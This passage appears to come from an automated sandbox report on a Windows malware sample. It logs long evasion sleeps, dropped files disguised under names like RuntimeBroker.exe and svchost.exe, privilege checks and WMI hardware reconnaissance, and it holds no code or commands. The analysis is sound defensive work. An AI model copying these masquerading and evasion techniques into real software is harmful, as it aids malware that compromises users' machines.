                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeMemory allocated: 2227D4C0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeMemory allocated: CC0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeMemory allocated: 1A720000 memory reserve | memory write watch
                                  Source: C:\Users\user\cscript.exeMemory allocated: 2AD0000 memory reserve | memory write watch
                                  Source: C:\Users\user\cscript.exeMemory allocated: 1AB50000 memory reserve | memory write watch
                                  Source: C:\Users\user\cscript.exeMemory allocated: 1180000 memory reserve | memory write watch
                                  Source: C:\Users\user\cscript.exeMemory allocated: 1ABF0000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\cscript.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5625Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 356Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7574Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1100Jump to behavior
                                  Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 2835Jump to behavior
                                  Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 3095Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeWindow / User API: threadDelayed 3175
                                  Source: C:\ProgramData\Microsoft\based.exeWindow / User API: threadDelayed 3076
                                  Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 3218
                                  Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 3184
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2798
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1675
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2062
                                  Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 3448
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3015
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 546
                                  Source: C:\Windows\System32\cmd.exeWindow / User API: threadDelayed 3412
                                  Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 3313
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2409
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZlZjQqUm.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\python310.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\KBGuTvrT.logJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\unicodedata.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\moRxsLqL.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\IIrMizFV.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\unicodedata.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_decimal.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\_decimal.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\_hashlib.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\select.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\_lzma.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_sqlite3.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\_hashlib.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\RhnciprG.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\_bz2.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\nCAYcgzI.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\select.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_ssl.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\_decimal.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\BhVFUouj.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\kuPhBLMV.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\python310.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\rar.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\PyvtgeZE.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\rtqOkdzB.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\unicodedata.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\NuVdFscS.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\iGLZQxQX.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\pYJguVIM.logJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\_socket.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\XSgjglWp.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\vosgrJpv.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\dTtanABj.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\select.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\shuXVqvz.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\FOowrzbf.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\DLBNVQXk.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\_bz2.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\FGEdMQBa.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\gEYquOMc.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_ctypes.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_bz2.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_queue.pydJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\_lzma.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_lzma.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\python310.dllJump to dropped file
                                  Source: C:\ProgramData\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\PGfLLOAK.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_hashlib.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-17040
                                  Source: C:\ProgramData\Microsoft\hacn.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeAPI coverage: 6.4 %
                                  Source: C:\Windows\System32\cmd.exeAPI coverage: 6.9 %
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exe TID: 7012Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116Thread sleep count: 5625 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132Thread sleep count: 356 > 30Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7092Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe TID: 7272Thread sleep count: 320 > 30Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe TID: 7272Thread sleep count: 169 > 30Jump to behavior
                                  Source: C:\Windows\System32\svchost.exe TID: 8256Thread sleep count: 3095 > 30Jump to behavior
                                  Source: C:\Windows\System32\svchost.exe TID: 8256Thread sleep time: -3095000s >= -30000sJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exe TID: 8260Thread sleep count: 3175 > 30
                                  Source: C:\ProgramData\Microsoft\based.exe TID: 8260Thread sleep time: -3175000s >= -30000s
                                  Source: C:\ProgramData\Microsoft\based.exe TID: 8292Thread sleep time: -3076000s >= -30000s
                                  Source: C:\Windows\System32\cmd.exe TID: 8336Thread sleep count: 3218 > 30
                                  Source: C:\Windows\System32\cmd.exe TID: 8336Thread sleep time: -3218000s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136Thread sleep count: 2798 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7360Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7080Thread sleep count: 1675 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1184Thread sleep count: 2062 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308Thread sleep time: -15679732462653109s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\SIHClient.exe TID: 7880Thread sleep time: -60000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe TID: 1888Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1208Thread sleep count: 3015 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2944Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6808Thread sleep count: 546 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6896Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\cmd.exe TID: 8308Thread sleep count: 3412 > 30
                                  Source: C:\Windows\System32\cmd.exe TID: 8308Thread sleep time: -3412000s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4336Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\cscript.exe TID: 8432Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                  Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                  Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                  Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                  Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                  Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                  Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                  Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                                  Source: C:\ProgramData\Microsoft\based.exeLast function: Thread delayed
                                  Source: C:\ProgramData\Microsoft\based.exeLast function: Thread delayed
                                  Source: C:\ProgramData\Microsoft\based.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\cscript.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\cscript.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0579B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF72B0579B0
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B0585A0 FindFirstFileExW,FindClose,5_2_00007FF72B0585A0
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 5_2_00007FF72B070B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF72B070B84
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B0585A0 FindFirstFileExW,FindClose,7_2_00007FF72B0585A0
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B070B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_00007FF72B070B84
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeCode function: 7_2_00007FF72B0579B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00007FF72B0579B0
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B4C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,13_2_00B4C4A8
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B5E560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,13_2_00B5E560
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,15_2_00007FF6D55E7F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55E7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,15_2_00007FF6D55E7F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55F1FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_00007FF6D55F1FE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 15_2_00007FF6D55D8B00 FindFirstFileExW,FindClose,15_2_00007FF6D55D8B00
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0055A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,21_2_0055A69B
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeCode function: 21_2_0056C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,21_2_0056C220
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0066A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,29_2_0066A69B
                                  Source: C:\ProgramData\svchost.exeCode function: 29_2_0067C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,29_2_0067C220
                                  Source: C:\Windows\System32\cmd.exeCode function: 32_2_0000023225B2DCE0 FindFirstFileExW,32_2_0000023225B2DCE0
                                  Source: C:\Windows\System32\tasklist.exeCode function: 38_2_0000016716C6DCE0 FindFirstFileExW,38_2_0000016716C6DCE0
                                  Source: C:\Windows\System32\tasklist.exeCode function: 39_2_00000245E891DCE0 FindFirstFileExW,39_2_00000245E891DCE0
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeCode function: 13_2_00B60B80 VirtualQuery,GetSystemInfo,13_2_00B60B80
                                  Source: C:\Users\user\Desktop\87Bym0x4Fy.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
